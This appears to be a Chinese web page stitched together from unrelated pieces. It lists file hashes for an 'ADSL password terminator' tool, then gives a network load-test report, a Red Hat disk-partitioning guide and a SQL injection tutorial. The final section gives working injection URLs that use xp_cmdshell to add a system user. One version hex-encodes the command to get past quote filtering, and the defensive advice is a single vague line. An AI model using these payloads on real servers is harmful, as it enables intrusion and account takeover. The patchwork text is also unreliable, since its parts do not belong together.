Adsl密码终结者2005--很老的一个工具了，
今天讲课用到了，就收藏下

文件: QiQi.exe
大小: 9204 字节
文件版本: 1.00
修改时间: 2005年6月1日, 0:24:14
MD5: C47C00042A08F548225FAB7D932F0516
SHA1: 44E82AA2986EAEEB774DA987A355B6F5E503B73D
CRC32: A4D0C267

文件: Setup.exe
大小: 3051385 字节
修改时间: 2005年5月27日, 13:52:36
MD5: 72D57EC0A6AB0E358223EE31A777A093
SHA1: 0435FBACBE458E7DC095DDC65947B0B5969E06FE
CRC32: 7E9124F9

      随着企业各种信息系统相继投入使用，生产、管理信息逐步增加，企业网络规模迅速扩大，信息城域网承受着空前的压力，网络带宽严重不足，网络系统传输丢包、设备死机情况频频发生。我们需要对网络状况做全面的分析。 公司大楼内计算机网络主干采用A T M 网络技术，骨干带宽155 Mb/s。整个信息网络系统主要分为３个层次，即核心交换层、远程子网层和用户接入层。

一、网络流量测试

(1) 测试目的：通过网络流量测试，获得网络的使用情况（利用率、碰撞、错误帧及广播四大参数) ，对网络物理层及数据链路层的健康状况进行评估。
(2) 测试工具: FL KE OptiView、EtherPeek NX、“北塔_BTNM”网管软件、mrtg 。
(3) 测试内容：对骨干链路长期记录流量取平均值与正常工作时间检测实时流量进行对比测试。使用m r t g 对核心交换机进行１ 个月的流量统计

二、网络负载压力测试

(1)测试目的：网络的实际传输速率同网络设备的性能、链路的质量、终端设备的数量、网络应用系统等因素有很大关系。通过网络压力测试，可以在一定程度上评估网络设备之间的实际传输速率以及交换机、路由器等设备的转发能力。通过专用网络测试设备模拟网络流量，人为增加网络负载，与此同时对网络的各种流量参数进行统计、分析，计算网络负载性能的分析数据。同时与流量分析的结果比较，可以比较出目前网络的总体状况。
(2)测试工具：FLUKE OptiView、ping、EtherPeek NX。
(3) 测试内容：避开工作时间,在网络中心和另外一个骨干节点间的网络链路进行压力测试。测试时当前网络流量为10 Mb/s左右，测试协议为IP，包大小选择为768 byte。
1,在此链路增加负载35 Mb/s压力，使用p i n g 工具检测发现开始丢包；
2, 对此链路增加50 Mb/s压力测试，ping检测链路不通;
3, 在链路上增加30 Mb/s广播包压力测试，模仿“蠕虫”等病毒发作时对网络的冲击，此时检测到链路中断。

三、网络协议分析

(1) 测试目的：了解目前网络中应用的协议的种类及每种协议所占的比例，可以清楚地反映出网络上在传输的应用系统以及所占的百分比。
(2)测试工具：FLUKE OptiView、EtherPeekNX 。
(3)测试内容：抓取网络正常时的IP 、TCP 、UDP 协议分布图。
1,网络骨干链路测试；
2,互联网出口测试。

四、应用系统测试

(1)测试目的：模拟单个用户在理想状态下与服务器通信，通过抓取分析客户端数据流入流出的情况，得出一个用户正常使用某一系统时的网络带宽要求，从而计算出公司各种信息应用系统服务器和所有用户正常使用网络服务所需要的总带宽。
(2)测试工具：EtherPeek NX。

五、结论

      根据多方面测试的数据，科学分析了在大型企业信息化应用环境下，企业网络中数据流量的构成，各种数据流对网络和通道的影响。综合分析可得出以下结论：网络实际平均利用率与目前设备能承受起的利用率相比只差11个百分点，在网络高峰时期的流量会高出目前设备能承受的流量，即网络使用处于高峰时间段内，会造成网络中断，在病毒爆发等特殊情况下网络会随时中断，测试结论与实际运行情况完全相符。

    在对硬盘进行分区前，应该先弄清楚计算机担负的工作及硬盘的容量有多大，还要考虑到以下几个问题。

　　第一点也是最重要的一点，要知道当前安装LILO的版本，因为LILO2.21及早期版本对硬盘大小有限制，如果安装LILO到1023磁道以外即8G的空间以外，LILO就无法启动。 但一些BIOS较老的机器，LINUX仍然无法突破1024磁道的限制，因此这些BIOS无法认出大于1024的硬盘空间。

　　还需要考虑的问题有：

　　· 是否限制用户可使用的磁盘空间大小？
　　· 在系统中需要安装哪些软件？
　　· 交换分区需要多大？
　　· 系统是否有多个硬盘？

　　下面，我们按系统工作性质的不同对分区的划分提出了一些建议。当然，根据实际情况，在满足系统工作需求的前提下，下面的分区大小也可以灵活的变动。

    基本工作站的分区方案
　　假设系统的硬盘大小是10G。

　　/boot 20M
　　Swap 128M
　　/root 9.85G

　　建立一个20M的/boot分区是为了避免将系统内核文件放到1024磁道以外，如果将/boot做为root分区的一个子目录，内核文件就会安装在root分区的任何地方，因为硬盘的大小超过了8G，所以在启动时就有可能出现问题。建议将交换分区的大小设置为内存的两倍，在这里我们假设系统的内存为64M。最后我们将硬盘的剩余空间全部分给了root分区。

Red Hat Linux 6.2 及其早期版本上的基本服务器硬盘分区方案
　　这里的服务器我们假设只提供几种通用的服务，如WWW服务及FTP服务等几种服务，通过telnet登录的用户数很少。假设其硬盘大小为25G。

　　/boot 20M
　　Swap 128M
　　/ 10G
　　/home 13G
　　/var 2G

　　在硬盘的最前面创建20M大小的/boot分区，原因同上。交换分区的大小也是128M，因为内存的大小为64M。

　　/ ，即root分区设为10G这么大是因为其中有一个/usr目录，这个目录可能会占用很多硬盘空间，特别是在安装了X Server，运行图形界面的应用程序的时候。

　　/home分区是硬盘中最大的分区，这似乎与我们假设系统用户数不多有些矛盾。实际上在/home目录下确实没有几个用户目录，但在Red Hat6.2及更早的版本中，Apache服务器和wu-ftpd FTP服务器被放在了/home/httpd及/home/ftp目录中。所以这个分区这么大也是有原因的。

　　最后，/var目录独自占用了一个分区，因为系统的所有日志都写到了/var/log目录下，这将会占用很大的硬盘空间。如果系统日志记录得非常详细，整个目录很快会被写满，导致系统工作呆滞。当然，可以通过系统日志后台守护程序syslogd来修改日志配置，避免发生这种情况。

Red Hat 7及以上版本的基本服务器分区方案
　　这种情况同前一个方案的情况相同，不同的是LINUX版本为Red Hat 7.0及其以上版本。

　　/boot 20M
　　Swap 128M
　　/ 10G
　　/var 15G

　　与RedHat6不同，在RedHat7中HTTP服务和FTP服务的目录现在位于 /var/www/ 和/var/ftp/，因此/var分区有15G之大也就不难理解了。

多用户服务器分区方案
　　在这种服务器系统中，同时有多个用户通过telnet, ssh, rlogin或其方式在远程访问系统。系统中有三个35G的硬盘驱动器，总共有105G的磁盘空间 。系统中用到了RAID 5技术做数据冗余。这种情况下，管理员必须为每个用户分配磁盘空间。对RedHat 6.2及更早的版本，分区如下：

　　Disk 1:
　　/boot 20M
　　/ 4G
　　/var 3GB
　　/home 27.98G

　　Disk 2:
　　swap 20MB
　　/ 4GB
　　/var 3GB
　　/home 27.98GB

　　Disk 3:
　　swap 20MB
　　/ 4GB
　　/var 3GB
　　/home 27.98GB

　　这样分区的原因：首先，Disk1上的20M /boot分区不属于任何RAID阵列，否则如果你将/boot放至RAID阵列中，以后就不能系统内核升级了。

　　为了方便管理，在其它两个硬盘中建立了20M的交换分区。这种服务器一般配有1G以上的内存，因此交换分区的大小不成问题。如果增大交换分区，就会减少RAID分区空间，所以20M是足够的。RAID分区的分组如下：

　　· 1-A, 2-A, and 3-A 一起组成一个8G的 RAID 5 驱动器，做为/根目录打开。
　　· 1-B, 2-B, and 3-B 组成 6GB的 RAID 5 驱动器，做为 /var目录。
　　· 1-C, 2-C, and 3-C 组成 55.96GB RAID 5 驱动器, 做为 /home.目录。

　　这种分配方案总共有55.96G的空间分配给所有用户及Apache和FTP服务，在/var下用6G空间用做记录日志、邮件，这么大的空间是足够的。

　　如果安装Red Hat7或以上版本，应给/var分区更大的空间，因为它同时还存放着WEB和FTP服务的两个目录。

可以解除限制的打印和复制功能



[sfile][/sfile]

来源：网络。

我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章，都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的，包括我写的那篇《SQL Injection的实现与应用》也是这样的例子，因为没有碰到任何的过滤，所以使我们相当轻松就注入成功了，如下：

http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--

　　这往往给大家造成误解，认为只要变量过滤了'就可以防止SQL Injection攻击，这种意识为大量程序可以注入埋下祸根，其实仅仅过滤'是不够的，在'被过滤的情况下我们照样玩，看下面语句：

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

　　是不是跟上面的那句有很大区别？可是效果完全是一样的。其实这些都是SQL语句。

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

　　这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白，先声明一个变量a，然后把我们的指令赋值给a，然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下：

declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a

解决办法：

　　过滤变量，限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。